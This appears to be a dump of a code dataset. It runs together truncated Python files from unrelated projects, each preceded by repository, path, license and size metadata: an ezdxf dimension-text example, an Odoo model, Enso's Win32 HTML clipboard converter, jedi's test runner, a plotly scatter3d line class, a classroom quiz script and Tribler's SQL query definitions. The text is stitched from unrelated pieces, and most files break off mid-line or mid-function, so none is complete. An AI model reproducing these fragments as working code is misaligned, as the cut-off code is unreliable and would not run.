example_for_all_text_placings(
doc, "dim_linear_text_placing_in_space_R2007.dxf", ucs
)
def example_for_all_text_placings(doc, filename, ucs=None):
"""This example shows many combinations of dimension text placing by
`halign`, `valign` and user defined location override.
Args:
doc: DXF drawing
filename: file name for saving
ucs: user defined coordinate system
"""
def add_text(lines, insert):
insert += (0.2, 0)
attribs = dict(TEXT_ATTRIBS)
line_space = 0.4
delta = Vec3(0, line_space, 0)
for line in lines:
text = msp.add_text(line, dxfattribs=attribs).set_pos(insert)
if ucs:
text.transform(ucs.matrix)
insert -= delta
msp = doc.modelspace()
setup_dimstyle(
doc,
name="TICK",
fmt="EZ_M_100_H25_CM",
style=DIM_TEXT_STYLE,
)
setup_dimstyle(
doc,
name="ARCHTICK",
fmt="EZ_M_100_H25_CM",
blk=ezdxf.ARROWS.architectural_tick,
style=DIM_TEXT_STYLE,
)
setup_dimstyle(
doc,
name="CLOSEDBLANK",
fmt="EZ_M_100_H25_CM",
blk=ezdxf.ARROWS.closed_blank,
style=DIM_TEXT_STYLE,
)
def text(dimstyle, x, y, halign, valign, oblique=0):
"""Default dimension text placing
Args:
            dimstyle: dimstyle to use
            x: start point x
            y: start point y
            halign: horizontal text alignment - "left", "right", "center",
"above1", "above2", requires DXF R2000+
valign: vertical text alignment "above", "center", "below"
oblique: angle of oblique extension line, 0 = orthogonal to
dimension line
"""
dimattr = {}
if oblique:
dimattr["oblique_angle"] = oblique
base = (x, y + 2)
# wide
dim = msp.add_linear_dim(
base=base,
p1=(x, y),
p2=(x + 5, y),
|
sandrafig/addons
|
stock_picking_reports/models/stock_picking.py
|
Python
|
agpl-3.0
| 179
| 0.005587
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
class StockPicking(models.Model):
_inherit = 'stock.picking'
    deliver = fields.Char(string="Deliver at")
|
rluch/InfoMine
|
infomine/comment.py
|
Python
|
mit
| 1,716
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Module containing methods for comment preprocessing (cleaning) """
class Comment(object):
"""
Comment Entity.
Besides getters and setters it handlers simple preprocessing methods
"""
def __init__(self, comment_string):
self._comment = comment_string
self._author = None
self._gender = None
self._male_likes = 0
self._female_likes = 0
@property
def comment(self):
return self._comment
@comment.setter
def comment(self, value):
        self._comment = value
@property
def author(self):
        return self._author
@author.setter
def author(self, value):
self._author = value
@property
def gender(self):
return self._gender
@gender.setter
def gender(self, value):
self._gender = value
@property
def male_likes(self):
return self._male_likes
@male_likes.setter
def male_likes(self, value):
self._male_likes = value
@property
def female_likes(self):
return self._female_likes
@female_likes.setter
def female_likes(self, value):
self._female_likes = value
@property
def likes(self):
""" Returns the calculated sum of male and female likes """
return self._male_likes + self._female_likes
@property
def likes_ratio(self):
""" Returns the male ratio """
if self.likes > 0:
return float(self.male_likes) / float(self.likes)
else:
return 0.0
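    # Illustrative sketch: with male_likes=3 and female_likes=1, likes == 4
    # and likes_ratio == 0.75; with no likes at all the ratio is 0.0.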
def __str__(self):
return '%s' % self._comment
def lower_comment(self):
self._comment = self._comment.lower()
|
berkus/enso
|
enso/platform/win32/selection/HtmlClipboardFormat.py
|
Python
|
bsd-3-clause
| 9,263
| 0.014574
|
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
The Win32 clipboard uses a special format for handling HTML. The basic
problem that the special format is trying to solve is that the user can
select an arbitrary chunk of formatted text that might not be valid HTML.
For instance selecting half-way through a bolded word would contain no </b>
tag. The solution is to encase the fragment in a valid HTML document.
You can read more about this at:
http://msdn.microsoft.com/workshop/networking/clipboard/htmlclipboard.asp
This module deals with converting between the clipboard HTML format and
standard HTML format.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
import logging
import re
# ----------------------------------------------------------------------------
# Private Functions
# ----------------------------------------------------------------------------
def _findFirst( pattern, src ):
"""
A helper function that simplifies the logic of using regex to find
the first match in a string.
"""
results = re.findall( pattern, src )
if len(results) > 0:
return results[0]
return None
# ----------------------------------------------------------------------------
# HtmlClipboardFormat Object
# ----------------------------------------------------------------------------
class HtmlClipboardFormat:
"""
Encapsulates the conversation between the clipboard HTML
format and standard HTML format.
"""
# The 1.0 HTML clipboard header format.
HEADER_FORMAT = \
"Version:1.0\r\n" \
"StartHTML:%(htmlStart)09d\r\n" \
"EndHTML:%(htmlEnd)09d\r\n" \
"StartFragment:%(fragmentStart)09d\r\n" \
"EndFragment:%(fragmentEnd)09d\r\n" \
"StartSelection:%(fragmentStart)09d\r\n" \
"EndSelection:%(fragmentEnd)09d\r\n" \
"SourceURL:Enso\r\n"
# A generic HTML page.
HTML_PAGE = \
"<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n" \
"<html>\n<head><title></title></head>\n" \
"<body>%s</body>\n" \
"</html>"
# These regexps find the character offsets of the fragment strings (see
# below) from the HTML clipboard format header.
START_RE = "StartFragment:(\d+)"
END_RE = "EndFragment:(\d+)"
# The Clipboard HTML format uses the following comment strings to mark
# the beginning and end of the text fragment which represents the user's
# actual selection; everything else is envelope.
START_FRAG = "<!-- StartFragment -->"
END_FRAG = "<!-- EndFragment -->"
def __init__( self, html ):
"""
Initializes the class to represent html.
"""
# Preconditions:
assert( type( html ) == unicode )
# The internal storage format is platonic unicode.
self.html = html
@classmethod
def fromClipboardHtml( cls, clipboardHtml ):
"""
Instantiates the class given a string containing the Win32 Html
Clipboard format. The given clipboardHtml is expected to be in
utf-8 and is expected to contain the special start-fragment and
end-fragment markers as defined in the class constants. If it's
not utf-8 or if it doesn't have the right delimiters, this function
logs a warning message and creates an instance empty of text.
"""
# Preconditions:
assert( type( clipboardHtml ) == str )
try:
html = clipboardHtml.decode( "utf-8" )
except UnicodeDecodeError:
# input can't be decoded from utf-8:
logging.warn( "Non-Utf-8 string in fromClipboardHtml." )
return cls( u"" )
start = _findFirst( cls.START_RE, clipboardHtml )
end = _findFirst( cls.END_RE, clipboardHtml )
if start and end:
html = clipboardHtml[ int(start): int(end) ]
html = html.decode( "utf-8" )
return cls( html )
else:
# Start and end not found in input:
logging.warn( "Missing delimiters in fromClipboardHtml." )
return cls( u"" )
@classmethod
def fromHtml( cls, html ):
"""
Instantiates the class given a string containing plain Html.
"""
# Preconditions:
assert( isinstance( html, unicode ) )
return cls( html )
def toClipboardHtml( self ):
"""
Returns the contents in the Win32 Html format.
"""
return self._encodeHtmlFragment( self.html )
def toHtml( self ):
"""
Returns the contents in the plain Html format.
"""
return self.html
def _createHtmlPage( self, fragment ):
"""
Takes an Html fragment and encloses it in a full Html page.
"""
return self.HTML_PAGE % fragment
def _encodeHtmlFragment(self, sourceHtml):
"""
Join all our bits of information into a string formatted as per the
clipboard HTML format spec.
The return value of this function is a Python string
encoded in UTF-8.
"""
# Preconditions:
assert( type( sourceHtml ) == unicode )
# LONGTERM TODO: The above contract statement involving
# .encode().decode() could have damaging performance
# repercussions.
# NOTE: Every time we construct a string, we must encode it to
# UTF-8 *before* we do any position-sensitive operations on
# it, such as taking its length or finding a substring
# position.
if "<body>" in sourceHtml:
htmlheader, fragment = sourceHtml.split( "<body>" )
fragment, footer = fragment.split( "</body>" )
htmlheader = htmlheader + "<body>"
footer = "</body>" + footer
fragment = "".join( [self.START_FRAG,
fragment,
self.END_FRAG] )
html = "".join([ htmlheader, fragment, footer ])
else:
fragment = sourceHtml
html = self._createHtmlPage( fragment )
fragment = fragment.encode( "utf-8" )
html = html.encode( "utf-8" )
assert html == html.decode( "utf-8" ).encode( "utf-8" ), \
"Encoding got out of whack in HtmlClipboardFo
|
rfguri/vimfiles
|
bundle/ycm/third_party/ycmd/third_party/JediHTTP/vendor/jedi/test/run.py
|
Python
|
mit
| 14,446
| 0.000692
|
#!/usr/bin/env python
"""
|jedi| is mostly being tested by what I would call "Blackbox Tests". These
tests are just testing the interface and do input/output testing. This makes a
lot of sense for |jedi|. Jedi supports so many different code structures, that
it is just stupid to write 200'000 unittests in the manner of
``regression.py``. Also, it is impossible to do doctests/unittests on most of
the internal data structures. That's why |jedi| uses mostly these kind of
tests.
There are different kind of tests:
- completions / goto_definitions ``#?``
- goto_assignments: ``#!``
- usages: ``#<``
How to run tests?
+++++++++++++++++
Jedi uses pytest_ to run unit and integration tests. To run tests,
simply run ``py.test``. You can also use tox_ to run tests for
multiple Python versions.
.. _pytest: http://pytest.org
.. _tox: http://testrun.org/tox
Integration test cases are located in ``test/completion`` directory
and each test cases are indicated by the comment ``#?`` (completions /
definitions), ``#!`` (assignments) and ``#<`` (usages). There is also
support for third party libraries. In a normal test run they are not
being executed, you have to provide a ``--thirdparty`` option.
In addition to standard `-k` and `-m` options in py.test, you can use
`-T` (`--test-files`) option to specify integration test cases to run.
It takes the format of ``FILE_NAME[:LINE[,LINE[,...]]]`` where
``FILE_NAME`` is a file in ``test/completion`` and ``LINE`` is a line
number of the test comment. Here are some recipes:
Run tests only in ``basic.py`` and ``imports.py``::
py.test test/test_integration.py -T basic.py -T imports.py
Run test at line 4, 6, and 8 in ``basic.py``::
py.test test/test_integration.py -T basic.py:4,6,8
See ``py.test --help`` for more information.
If you want to debug a test, just use the ``--pdb`` option.
Alternate Test Runner
+++++++++++++++++++++
If you don't like the output of ``py.test``, there's an alternate test runner
that you can start by running ``./run.py``. The above example could be run by::
./run.py basic 4 6 8 50-80
The advantage of this runner is simplicity and more customized error reports.
Using both runners will help you to have a quicker overview of what's
happening.
Auto-Completion
+++++++++++++++
Uses comments to specify a test in the next line. The comment says, which
results are expected. The comment always begins with `#?`. The last row
symbolizes the cursor.
For example::
#? ['real']
a = 3; a.rea
Because it follows ``a.rea`` and a is an ``int``, which has a ``real``
property.
Goto Definitions
++++++++++++++++
Definition tests use the same symbols like completion tests. This is
possible because the completion tests are defined with a list::
#? int()
ab = 3; ab
Goto Assignments
++++++++++++++++
Tests look like this::
abc = 1
#! ['abc=1']
abc
Additionally it is possible to add a number which describes to position of
the test (otherwise it's just end of line)::
#! 2 ['abc=1']
abc
Usages
++++++
Tests look like this::
abc = 1
#< abc@1,0 abc@3,0
abc
"""
import os
import re
import sys
import operator
from ast import literal_eval
from io import StringIO
from functools import reduce
import jedi
from jedi._compatibility import unicode, is_py3
from jedi.parser import Parser, load_grammar
from jedi.api.classes import Definition
TEST_COMPLETIONS = 0
TEST_DEFINITIONS = 1
TEST_ASSIGNMENTS = 2
TEST_USAGES = 3
class IntegrationTestCase(object):
def __init__(self, test_type, correct, line_nr, column, start, line,
path=None, skip=None):
self.test_type = test_type
self.correct = correct
self.line_nr = line_nr
self.column = column
self.start = start
self.line = line
self.path = path
self.skip = skip
@property
def module_name(self):
return os.path.splitext(os.path.basename(self.path))[0]
@property
def line_nr_test(self):
"""The test is always defined on the line before."""
return self.line_nr - 1
def __repr__(self):
return '<%s: %s:%s:%s>' % (self.__class__.__name__, self.module_name,
self.line_nr_test, self.line.rstrip())
def script(self):
return jedi.Script(self.source, self.line_nr, self.column, self.path)
def run(self, compare_cb):
testers = {
TEST_COMPLETIONS: self.run_completion,
TEST_DEFINITIONS: self.run_goto_definitions,
TEST_ASSIGNMENTS: self.run_goto_assignments,
TEST_USAGES: self.run_usages,
}
return testers[self.test_type](compare_cb)
def run_completion(self, compare_cb):
completions = self.script().completions()
#import cProfile; cProfile.run('script.completions()')
comp_str = set([c.name for c in completions])
return compare_cb(self, comp_str, set(literal_eval(self.correct)))
def run_goto_definitions(self, compare_cb):
script = self.script()
evaluator = script._evaluator
def comparison(definition):
suffix = '()' if definition.type == 'instance' else ''
return definition.desc_with_module + suffix
def definition(correct, correct_start, path):
should_be = set()
for match in re.finditer('(?:[^ ]+)', correct):
string = match.group(0)
parser = Parser(load_grammar(), string, start_symbol='eval_input')
parser.position_modifier.line = self.line_nr
element = parser.get_parsed_node()
element.parent = jedi.api.completion.get_user_scope(
script._get_module(),
(self.line_nr, self.column)
)
results = evaluator.eval_element(element)
if not results:
raise Exception('Could not resolve %s on line %s'
% (match.string, self.line_nr - 1))
should_be |= set(Definition(evaluator, r) for r in results)
# Because the objects have different ids, `repr`, then compare.
should = set(comparison(r) for r in should_be)
return should
should = definition(self.correct, self.start, script.path)
result = script.goto_definitions()
is_str = set(comparison(r) for r in result)
return compare_cb(self, is_str, should)
def run_goto_assignments(self, compare_cb):
result = self.script().goto_assignments()
comp_str = str(sorted(str(r.description) for r in result))
return compare_cb(self, comp_str, self.correct)
def run_usages(self, compare_cb):
result = self.script().usages()
self.correct = self.correct.strip()
compare = sorted((r.module_name, r.line, r.column) for r in result)
wanted = []
if not self.correct:
positions = []
else:
positions = literal_eval(self.correct)
for pos_tup in positions:
if type(pos_tup[0]) == str:
# this means that there is a module specified
wanted.append(pos_tup)
else:
line = pos_tup[0]
if pos_tup[0] is not None:
line += self.line_nr
wanted.append((self.module_name, line, pos_tup[1]))
return compare_cb(self, compare, sorted(wanted))
def skip_python_version(line):
comp_map = {
'==': 'eq',
'<=': 'le',
'>=': 'ge',
        '<': 'lt',
        '>': 'gt',
}
# check for python minimal version number
match = re.match(r" *# *python *([<>]=?|==) *(\d+(?:\.\d+)?)$", line)
if match:
minimal_python_version = tuple(
map(int, match.group(2).split(".")))
operation = getattr(operator, comp_map[match.group(1)])
if not operation(sys.version_info, minimal_python_version):
return "Minimal python version %s %s" % (match.group(1), match.group(2))
return None
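# Illustrative sketch: for a test line "# python >= 3.3" run under a 2.7
# interpreter, skip_python_version returns "Minimal python version >= 3.3";
# under 3.4+ it returns None and the test is kept.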
def collect_file_tests(path, lines, lines_to_execute):
def makecase(
|
bozzzzo/quark
|
quarkc/test/test_parse.py
|
Python
|
apache-2.0
| 1,856
| 0.003233
|
# Copyright 2015 datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, pytest
from quarkc.compiler import Compiler
from .util import assert_file, maybe_xfail, is_excluded_file
directory = os.path.join(os.path.dirname(__file__), "parse")
files = [name for name in os.listdir(directory) if name.endswith(".q")]
paths = [os.path.join(directory, name) for name in files]
@pytest.fixture(params=paths)
def path(request):
return request.param
def test_parse(path):
parse(path, is_excluded_file)
def test_parse_builtin():
parse(os.path.join(directory, "empty-file.q"), lambda x: False)
def parse(path, file_filter):
dir = os.path.dirname(path)
text = open(path).read()
maybe_xfail(text)
c = Compiler()
c.urlparse(path, recurse=False)
for ast in c.roots[path].files:
if file_filter(ast.filename): continue
base = os.path.splitext(ast.filename)[0]
assert_file(os.path.join(dir, base + ".ast"), ast.pprint())
code = ast.code()
assert_file(os.path.join(dir, base + ".code"), code)
rtc = Compiler()
rtc.urlparse(base + ".code", recurse=False)
for f in rtc.roots[base + ".code"].files:
if f.name == base + ".code":
assert f.code() == code
break
else:
assert False
|
precompiler/python-101
|
learning-python/ch03/ConditionalProgramming.py
|
Python
|
apache-2.0
| 413
| 0.002421
|
income = 15000
if income < 10000:
taxCoefficient = 0.0
elif income < 30000:
taxCoefficient = 0.2
elif income < 100000:
taxCoefficient = 0.35
else:
taxCoefficient = 0.45
print("Need to pay: "
|
, income * taxCoefficient, "in taxes")
flag = False
if flag:
print("a")
print("b")
if flag:
print("c")
print("d")
orderAmount = 300
discount = 25 if orderAmount > 100 else 0
print(discount)
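# Conditional expressions can also be chained (an illustrative sketch, not
# part of the original lesson):
# shipping = 0 if orderAmount > 200 else (5 if orderAmount > 50 else 10)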
|
elizabethtweedale/HowToCode2
|
SuperSkill-08-Teacher/Teacher-Quiz.py
|
Python
|
gpl-3.0
| 3,594
| 0.010295
|
# Teacher Quiz - Python Code - Elizabeth Tweedale
import csv, random
def askName(): # askName function returns the name of the student
print("Welcome to the Super Python Quiz!")
yourName = input("What is your name? ")
print ("Hello",str(yourName))
return yourName
def getQuestions(): # getQuestions reads in the questions from a CSV file
    questions = []                      # this creates an empty list for adding the questions to
with open("SuperPythonQuiz.csv", mode="r", encoding="utf-8") as myFile:
myQuiz = csv.reader(myFile)
for row in myQuiz:
questions.append(row)
return questions
def askQuestion(question,score):        # askQuestion prints the question and choices to the screen then checks the answer
print(question[0]) # print the question - this is in the [0] position of the row
for eachChoice in question[1:-1]: # print each choice from [1] to the last position [-1]
print("{0:>5}{1}".format("", eachChoice))
answer = input("Please select an answer: ") # get the student's answer
if answer == question[-1]: # check if the answer matches the last position in the question, the correct answer
print("Correct!") # if it's correct, tell the user and add one to the score
score += 1
else: # if it's incorrect, tell the user what the correct answer was
print("Incorrect, the correct answer was {0}.".format(question[-1]))
return score # return the score
def recordScore(studentName, score):
with open("QuizResults.txt", mode="a+",encoding="utf-8") as myFile: # note the '+' sign after the a means if the file does not exist, then create it
myFile.write(str(studentName) + "," + str(score) + "\n") # write name,score to the file
# "\n" will add a new line to the file so that it's ready for the next name
def main():
studentName = askName() # call the askName function
questions = getQuestions() # call the getQuestions function
score = 0 # initialise the score to 0
number = len(questions) # use the number to keep track of the total number of questions - which is the length of the 'questions' list
    for eachQuestion in range(number):                    # repeat for each question
question = random.choice(questions) # choose a random question from the questions list
score = askQuestion(question,score) # ask the question and update the score
questions.remove(question) # remove the current question from the list so that you don't ask it again
print("Your final score is:", score, "out of:", number) # tell the user what their final score is
recordScore(studentName, score) # call the recordScore function
main()
|
plotly/plotly.py
|
packages/python/plotly/plotly/graph_objs/scatter3d/marker/_line.py
|
Python
|
mit
| 24,077
| 0.000955
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Line(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "scatter3d.marker"
_path_str = "scatter3d.marker.line"
_valid_props = {
"autocolorscale",
"cauto",
"cmax",
"cmid",
"cmin",
"color",
"coloraxis",
"colorscale",
"colorsrc",
"reversescale",
"width",
}
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
        `marker.line.colorscale`. Has an effect only if
        `marker.line.color` is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is true, the
default palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# cauto
# -----
@property
def cauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here in `marker.line.color`) or the
        bounds set in `marker.line.cmin` and `marker.line.cmax`. Has an
        effect only if `marker.line.color` is set to a numerical
        array. Defaults to `false` when `marker.line.cmin` and
`marker.line.cmax` are set by the user.
The 'cauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["cauto"]
@cauto.setter
def cauto(self, val):
self["cauto"] = val
# cmax
# ----
@property
def cmax(self):
"""
        Sets the upper bound of the color domain. Has an effect only if
        `marker.line.color` is set to a numerical array. Value should
have the same units as in `marker.line.color` and if set,
`marker.line.cmin` must be set as well.
The 'cmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmax"]
@cmax.setter
def cmax(self, val):
self["cmax"] = val
# cmid
# ----
@property
def cmid(self):
"""
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be equidistant
        to this point. Has an effect only if `marker.line.color` is
set to a numerical array. Value should have the same units as
in `marker.line.color`. Has no effect when `marker.line.cauto`
is `false`.
The 'cmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmid"]
@cmid.setter
def cmid(self, val):
self["cmid"] = val
# cmin
# ----
@property
def cmin(self):
"""
        Sets the lower bound of the color domain. Has an effect only if
        `marker.line.color` is set to a numerical array. Value should
have the same units as in `marker.line.color` and if set,
`marker.line.cmax` must be set as well.
The 'cmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmin"]
@cmin.setter
def cmin(self, val):
self["cmin"] = val
# color
# -----
@property
def color(self):
"""
        Sets the marker.line color. It accepts either a specific color or
an array of numbers that are mapped to the colorscale relative
to the max and min values of the array or relative to
`marker.line.cmin` and `marker.line.cmax` if set.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown,
burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A number that will be interpreted as a color
according to scatter3d.marker.line.colorscale
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# coloraxis
# ---------
@property
def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. Has an effect only if
`marker.line.color` is set to a numerical array.
|
egbertbouman/tribler-g
|
Tribler/Core/CacheDB/MetadataDBHandler.py
|
Python
|
lgpl-2.1
| 40,875
| 0.013187
|
# Written by Andrea Reale
# see LICENSE.txt for license information
from Tribler.Core.Subtitles.MetadataDomainObjects.SubtitleInfo import SubtitleInfo
from Tribler.Core.Subtitles.MetadataDomainObjects.MetadataDTO import MetadataDTO
from Tribler.Core.CacheDB.SqliteCacheDBHandler import BasicDBHandler
import threading
from Tribler.Core.CacheDB.sqlitecachedb import SQLiteCacheDB
import sys
from Tribler.Core.Subtitles.MetadataDomainObjects.MetadataExceptions import SignatureException, \
MetadataDBException
from Tribler.Core.Utilities.utilities import bin2str, str2bin
import sqlite3
import time
SUBTITLE_LANGUAGE_CODE = "lang"
SUBTITLE_PATH = "path"
METADATA_TABLE = "Metadata"
MD_ID_KEY = "metadata_id"
MD_PUBLISHER_KEY = "publisher_id"
MD_INFOHASH_KEY = "infohash"
MD_DESCRIPTION_KEY = "description"
MD_TIMESTAMP_KEY = "timestamp"
MD_SIGNATURE_KEY = "signature"
SUBTITLES_TABLE = "Subtitles"
SUB_MD_FK_KEY = "metadata_id_fk"
SUB_LANG_KEY = "subtitle_lang"
SUB_LOCATION_KEY = "subtitle_location"
SUB_CHECKSUM_KEY = "checksum"
SUBTITLES_HAVE_TABLE = "SubtitlesHave"
SH_MD_FK_KEY = "metadata_id_fk"
SH_PEER_ID_KEY = "peer_id"
SH_HAVE_MASK_KEY = "have_mask"
SH_TIMESTAMP = "received_ts"
# maximum number of have entries returned
# by the database (-1 for unlimited)
SH_RESULTS_LIMIT = 200
DEBUG = False
# It's good to have all of the queries in one place:
# the code is easier to read, and if some query is wrong
# it is easier to correct them all
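# For illustration, a hedged sketch of how a handler method is expected to
# consume these named queries (cursor and parameter names are assumptions,
# not the original handler API): each query uses positional "?" placeholders
# bound at execution time, e.g.
#   cursor.execute(QUERIES["SELECT METADATA"], (infohash, publisher_id))
#   row = cursor.fetchone()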
SELECT_SUBS_JOIN_BASE = "SELECT sub." + SUB_MD_FK_KEY + ", sub." + SUB_LANG_KEY \
+ ", sub." + SUB_LOCATION_KEY \
+ ", sub." + SUB_CHECKSUM_KEY \
+ " FROM " + METADATA_TABLE + " AS md " \
+ "INNER JOIN " \
+ SUBTITLES_TABLE + " AS sub " \
+ "ON md." + MD_ID_KEY + " = sub." + SUB_MD_FK_KEY
MD_SH_JOIN_CLAUSE = \
METADATA_TABLE + " AS md " \
+ "INNER JOIN " \
+ SUBTITLES_HAVE_TABLE + " AS sh " \
+ "ON md." + MD_ID_KEY + " = sh." + SH_MD_FK_KEY
QUERIES = {
"SELECT SUBS JOIN HASH ALL" :
SELECT_SUBS_JOIN_BASE
+ " WHERE md." + MD_INFOHASH_KEY + " = ?"\
+ " AND md." + MD_PUBLISHER_KEY + " = ?;",
"SELECT SUBS JOIN HASH ONE" :
SELECT_SUBS_JOIN_BASE
+ " WHERE md." + MD_INFOHASH_KEY + " = ?"\
+ " AND md." + MD_PUBLISHER_KEY + " = ?"\
+ " AND sub." + SUB_LANG_KEY + " = ?;",
"SELECT SUBS FK ALL" :
"SELECT * FROM " + SUBTITLES_TABLE
+ " WHERE " + SUB_MD_FK_KEY + " = ?;",
"SELECT SUBS FK ONE" :
"SELECT * FROM " + SUBTITLES_TABLE
+ " WHERE " + SUB_MD_FK_KEY + " = ?"\
+ " AND " + SUB_LANG_KEY + " = ?;",
"SELECT METADATA" :
"SELECT * FROM " \
+ METADATA_TABLE + " WHERE " + MD_INFOHASH_KEY + " = ?" \
+ " AND " + MD_PUBLISHER_KEY + " = ?;",
"SELECT NRMETADATA" :
"SELECT COUNT(*) FROM " \
+ METADATA_TABLE + " WHERE " + MD_PUBLISHER_KEY + " = ?;",
"SELECT PUBLISHERS FROM INFOHASH":
"SELECT " + MD_PUBLISHER_KEY + " FROM " + METADATA_TABLE \
+ " WHERE " + MD_INFOHASH_KEY + " = ?;",
"UPDATE METADATA" :
"UPDATE " + METADATA_TABLE \
+ " SET " \
+ MD_DESCRIPTION_KEY + " = ?, " \
+ MD_TIMESTAMP_KEY + " = ?, " \
+ MD_SIGNATURE_KEY + " = ?" \
+ " WHERE " + MD_INFOHASH_KEY + " = ?" \
+ " AND " + MD_PUBLISHER_KEY + " = ?;",
"UPDATE SUBTITLES" :
"UPDATE " + SUBTITLES_TABLE \
+ " SET " + SUB_LOCATION_KEY + "= ?, " \
+ SUB_CHECKSUM_KEY + "= ?" \
+ " WHERE " + SUB_MD_FK_KEY + "= ?" \
+ " AND " + SUB_LANG_KEY + "= ?;",
"DELETE ONE SUBTITLES" :
"DELETE FROM " + SUBTITLES_TABLE \
+ " WHERE " + SUB_MD_FK_KEY + "= ? " \
+ " AND " + SUB_LANG_KEY + "= ?;",
"DELETE ONE SUBTITLE JOIN" :
"DELETE FROM " + SUBTITLES_TABLE \
+ " WHERE " + SUB_MD_FK_KEY \
+ " IN ( SELECT " + MD_ID_KEY + " FROM " + METADATA_TABLE \
+ " WHERE " + MD_PUBLISHER_KEY + " = ?" \
+ " AND " + MD_INFOHASH_KEY + " = ? )" \
+ " AND " + SUB_LANG_KEY + "= ?;",
"DELETE ALL SUBTITLES" :
